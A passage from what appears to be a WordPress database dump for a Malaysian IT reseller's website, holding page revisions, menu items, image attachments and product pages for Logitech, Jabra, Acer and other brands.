investment.</p>','ABOUT','','inherit','closed','closed','','1287-revision-v1','','','2018-12-11 11:01:21','2018-12-11 03:01:21','',1287,'https://bintara.com.my/blog/2018/12/11/1287-revision-v1/',0,'revision','',0),(1290,1,'2018-12-11 11:04:07','2018-12-11 03:04:07','<p style=\"text-align: center;\">BINTARA is a multi-brand technology solutions provider to business, government, education and\r\nhealthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their technology investment.</p>','ABOUT','','inherit','closed','closed','','1287-revision-v1','','','2018-12-11 11:04:07','2018-12-11 03:04:07','',1287,'https://bintara.com.my/blog/2018/12/11/1287-revision-v1/',0,'revision','',0),(1296,1,'2018-12-11 11:12:22','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2018-12-11 11:12:22','0000-00-00 00:00:00','',0,'https://bintara.com.my/?p=1296',1,'nav_menu_item','',0),(1303,1,'2018-12-11 11:23:18','2018-12-11 03:23:18','','SERVICES','','publish','closed','closed','','services','','','2019-09-24 08:57:12','2019-09-24 00:57:12','',0,'https://bintara.com.my/?p=1303',2,'nav_menu_item','',0),(1304,1,'2018-12-11 11:23:18','2018-12-11 03:23:18','','CONTACT','','publish','closed','closed','','contact','','','2018-12-11 17:45:08','2018-12-11 09:45:08','',0,'https://bintara.com.my/?p=1304',7,'nav_menu_item','',0),(1305,1,'2018-12-11 11:23:18','2018-12-11 03:23:18','','CAREERS','','publish','closed','closed','','careers','','','2019-09-24 08:57:12','2019-09-24 00:57:12','',0,'https://bintara.com.my/?p=1305',5,'nav_menu_item','',0),(1306,1,'2018-12-11 11:24:59','2018-12-11 03:24:59','','NEWS & EVENTS','','publish','closed','closed','','news-events','','','2019-09-24 08:57:12','2019-09-24 00:57:12','',0,'https://bintara.com.my/?p=1306',4,'nav_menu_item','',0),(1311,1,'2018-12-11 11:32:31','2018-12-11 03:32:31','<!-- wp:paragraph -->\r\n<p>Logitech has announced Logitech Rally, a modular conference cam that features Ultra-HD 4K video, modular audio components, PTZ capabilities and Logitech RightSense technology.</p>\r\n<p>â€œJust a few years ago, a high quality video and audio system like Logitech Rally would have easily been a five-figure investment,â€ said Scott Wharton, vice president and general manager of the Logitech Video Collaboration.</p>\r\n<p>â€œNow, with the Rally portfolio of products, customers get a premium, modular system that raises the bar for USB-connected AV solutions - all at a fraction of the price of other high-end systems.â€</p>\r\n<p>Rally separated the speakers from the microphones. By mounting speakers near the display, the audio is better aligned with video, and voices of far-end participants come from the front of the room, which is what people intuitively expect, according to Logitech.</p>\r\n<p>\"Logitech has enjoyed great success with its affordable USB conferencecams which work well in traditional meeting rooms and huddle spaces,â€ said Ira M. Weinstein, managing partner, Recon Research.</p>\r\n<p>\"But until now, Logitech lacked a premium offering for larger spaces. The Rally portfolio gives Logitech the opportunity to move up-market and extend the reach of its conferencecam lineup. Based on what Iâ€™ve seen, Rally has the potential to be as disruptive as the earlier Logitech conferencecam solutionsâ€</p>\r\n<p><br />The standalone Logitech Rally Camera is available for $1999.95. The Logitech Rally system, which includes Rally Camera, plus table and display hubs, one speaker and one mic pod, is available for $3599.95.</p>\r\n<p>Source:Â https://www.pcworld.idg.com.au/article/648153/logitech-announces-logitech-rally/Â </p>\r\n<!-- /wp:paragraph -->','Logitech announces Logitech Rally','','inherit','closed','closed','','1-revision-v1','','','2018-12-11 11:32:31','2018-12-11 03:32:31','',1,'https://bintara.com.my/blog/2018/12/11/1-revision-v1/',0,'revision','',0),(1313,1,'2018-12-11 11:41:42','2018-12-11 03:41:42','Laptop and desktop PCs, tablets, smartphones, monitors, projectors\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone wp-image-1269\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Logo-Bintara-Asal.png\" alt=\"\" width=\"426\" height=\"154\" />','ACER','','publish','closed','closed','','products-acer','','','2018-12-11 11:48:54','2018-12-11 03:48:54','',0,'https://bintara.com.my/?page_id=1313',0,'page','',0),(1314,1,'2018-12-11 11:41:42','2018-12-11 03:41:42','Laptop and desktop PCs, tablets, smartphones, monitors, projectors\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone  wp-image-1269\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Logo-Bintara-Asal.png\" alt=\"\" width=\"426\" height=\"154\" />','ACER','','inherit','closed','closed','','1313-revision-v1','','','2018-12-11 11:41:42','2018-12-11 03:41:42','',1313,'https://bintara.com.my/blog/2018/12/11/1313-revision-v1/',0,'revision','',0),(1336,1,'2018-12-11 12:09:10','2018-12-11 04:09:10','','c925e-webcam','','inherit','closed','closed','','c925e-webcam','','','2018-12-11 12:09:10','2018-12-11 04:09:10','',16,'https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png',0,'attachment','image/png',0),(1335,1,'2018-12-11 12:09:11','2018-12-11 04:09:11','Enterprise Wireless LAN Solutions. <a href=\"http://bintara.com.my/aruba\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1815\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Aruba.png\" alt=\"\" width=\"1024\" height=\"681\" />','ARUBA','','publish','closed','closed','','aruba','','','2019-01-02 16:14:51','2019-01-02 08:14:51','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1335',0,'portfolio','',0),(1316,1,'2018-12-11 11:43:59','2018-12-11 03:43:59','','meetup-conference-cam','','inherit','closed','closed','','meetup-conference-cam','','','2018-12-11 11:43:59','2018-12-11 03:43:59','',16,'https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png',0,'attachment','image/png',0),(1318,1,'2018-12-11 11:45:46','2018-12-11 03:45:46','','conferencecam-connect','','inherit','closed','closed','','conferencecam-connect','','','2018-12-11 11:45:46','2018-12-11 03:45:46','',16,'https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png',0,'attachment','image/png',0),(1319,1,'2018-12-11 11:46:48','2018-12-11 03:46:48','','conferencecam-bcc950','','inherit','closed','closed','','conferencecam-bcc950','','','2018-12-11 11:46:48','2018-12-11 03:46:48','',16,'https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png',0,'attachment','image/png',0),(1636,1,'2018-12-11 16:06:48','2018-12-11 08:06:48','<a href=\"https://bintara.com.my/gototraining/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1679\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-181x.png\" alt=\"\" width=\"1024\" height=\"681\" />','GOTOTRAINING','','publish','closed','closed','','gototraining','','','2019-09-23 16:44:36','2019-09-23 08:44:36','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1636',0,'portfolio','',0),(1334,1,'2018-12-11 12:06:39','2018-12-11 04:06:39','','c930e-webcam','','inherit','closed','closed','','c930e-webcam','','','2018-12-11 12:06:39','2018-12-11 04:06:39','',16,'https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png',0,'attachment','image/png',0),(1321,1,'2018-12-11 11:48:21','2018-12-11 03:48:21','','ptz-pro-2-camera','','inherit','closed','closed','','ptz-pro-2-camera','','','2018-12-11 11:48:21','2018-12-11 03:48:21','',16,'https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png',0,'attachment','image/png',0),(1323,1,'2018-12-11 11:50:38','2018-12-11 03:50:38','Laptop and desktop PCs, tablets, smartphones, monitors, projectors and cloud solutions. <a href=\"http://bintara.com.my/acer\">Read More...</a><!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1716\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','ACER','','publish','closed','closed','','acer','','','2019-01-02 16:13:51','2019-01-02 08:13:51','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1323',0,'portfolio','',0),(2882,1,'2019-02-11 17:10:04','2019-02-11 09:10:04','<h2>Jabra.</h2><h3>Sound thatâ€™s engineered for you</h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.</p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.</p><h2>Jabra Evolve Series</h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office</h3>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg 585w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Better concentration, greater productivity</h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.</p><ul><li>World-class speakers to deliver amazing sound for calls and music.</li><li>Call-management features allow for incredible ease-of-use..</li><li>Compatible with all leading UC platforms.</li></ul><h3>Jabra Evolve 65t</h3><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png\" alt=\"\" />											\n		<h3>Jabra Evolve 80</h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 75e</h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation â€“ but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\" alt=\"\" />											\n		<h3>Jabra Evolve 75</h3><p>Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise â€“ and need mobility around the workspace. Move up to 100ft/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 65 Stereo / Mono</h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\" alt=\"\" />											\n		<h3>Jabra Evolve 40 Stereo / Mono</h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 30 Stereo / Mono</h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_30_.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" />											\n		<h3>Jabra Evolve 20 Stereo / Mono</h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 20 SE</h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono.png 400w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n										<img width=\"263\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3-263x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3-263x300.png 263w, https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3.png 550w\" sizes=\"(max-width: 263px) 100vw, 263px\" />											\n		<h4>Jabra Engage 50</h4><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform â€“ whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.</p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.</p><p>[maxbutton id=\"14\" ]</p><h2>Jabra Biz Wired Series</h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.</h3><h3>Jabra Biz 2400 II</h3><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p>[maxbutton id=\"14\" ]</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-768x768.png 768w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-1024x1024.png 1024w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png 1354w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1-150x150.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1-768x768.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1.jpg 1000w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n		<h3>Jabra BIZ 2400 II Mono 3-in-1</h3><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p>[maxbutton id=\"14\" ]</p><h3>Jabra Biz 2400 II DUO</h3><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p>[maxbutton id=\"14\" ]</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-768x768.png 768w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-1024x1024.png 1024w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png 1354w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n		https://youtu.be/85RJqPjfjng		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz2300-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz2300-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz2300-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz2300-768x768.png 768w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz2300-1024x1024.png 1024w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz2300.png 1400w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n		<h3>Jabra Biz 2300</h3><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.</p><p>[maxbutton id=\"14\" ]</p><h3>Jabra Biz 2300 QD</h3><p>Jabra Bizâ„¢ 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p>[maxbutton id=\"14\" ]</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD.png 350w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png 350w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n		<h3>Jabra Biz 2300 QD DUO</h3><p>Jabra Bizâ„¢ 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p>[maxbutton id=\"14\" ]</p><h3>Jabra Biz 1500</h3><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.</p><p>[maxbutton id=\"14\" ]</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD-1-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD-1-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD-1-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD-1-768x768.png 768w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD-1-1024x1024.png 1024w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD-1.png 1400w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB-768x768.png 768w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB-1024x1024.png 1024w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB.png 1400w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n		<h3>Jabra Biz 1500 DUO USB</h3><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.</p><p>[maxbutton id=\"14\" ]</p>','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2019-02-11 17:10:04','2019-02-11 09:10:04','',1532,'https://bintara.com.my/blog/2019/02/11/1532-revision-v1/',0,'revision','',0),(1341,1,'2018-12-11 12:13:21','2018-12-11 04:13:21','Notebooks, Desktop and Monitors. <a href=\"http://bintara.com.my/asus\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1816\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Asus-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','ASUS','','publish','closed','closed','','asus','','','2019-01-02 16:34:14','2019-01-02 08:34:14','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1341',0,'portfolio','',0),(1342,1,'2018-12-11 12:13:51','2018-12-11 04:13:51','Qualitative Data Analysis &amp; Research Software. <a href=\"http://bintara.com.my/atlas.ti\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1769\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Atlas.ti-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','ATLAS.TI','','publish','closed','closed','','atlas-ti','','','2019-01-02 16:34:29','2019-01-02 08:34:29','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1342',0,'portfolio','',0),(3647,1,'2019-10-03 15:30:29','2019-10-03 07:30:29','<h1 style=\"text-align: center;\"><strong>Jabra</strong></h1><h3 style=\"text-align: center;\">Sound thatâ€™s engineered for you</h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.</p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.</p><h2>Jabra Evolve Series</h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office</h3>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-20x20.jpg 20w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg 585w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Better concentration, greater productivity</h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.</p><ul><li>World-class speakers to deliver amazing sound for calls and music.</li><li>Call-management features allow for incredible ease-of-use..</li><li>Compatible with all leading UC platforms.</li></ul>		\n		<h2 style=\"text-align: center;\"><strong>Jabra Evolve 65t</strong></h2><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" width=\"163\" height=\"163\" /></p><p>Â </p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png\" alt=\"\" width=\"203\" height=\"203\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 80</strong></h2><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 75e</strong></h2><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation â€“ but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png\" alt=\"\" width=\"205\" height=\"205\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\" alt=\"\" width=\"201\" height=\"201\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 75</strong></h2><p>Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise â€“ and need mobility around the workspace. Move up to 100ft/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 65 Stereo / Mono</strong></h2><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png\" alt=\"\" width=\"203\" height=\"203\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\" alt=\"\" width=\"209\" height=\"209\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 40 Stereo / Mono</strong></h2><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 30 Stereo / Mono</strong></h2><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" width=\"200\" height=\"200\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" width=\"216\" height=\"216\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 20 Stereo / Mono</strong></h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 20 SE</strong></h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono.png\" alt=\"\" width=\"204\" height=\"204\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3.png\" alt=\"\" width=\"219\" height=\"249\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Engage 50</strong></h2><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform â€“ whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.</p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p>		\n		<h2><strong>Jabra Biz Wired Series</strong></h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.</h3><h2 style=\"text-align: center;\"><strong>Jabra Biz 2400 II</strong></h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. 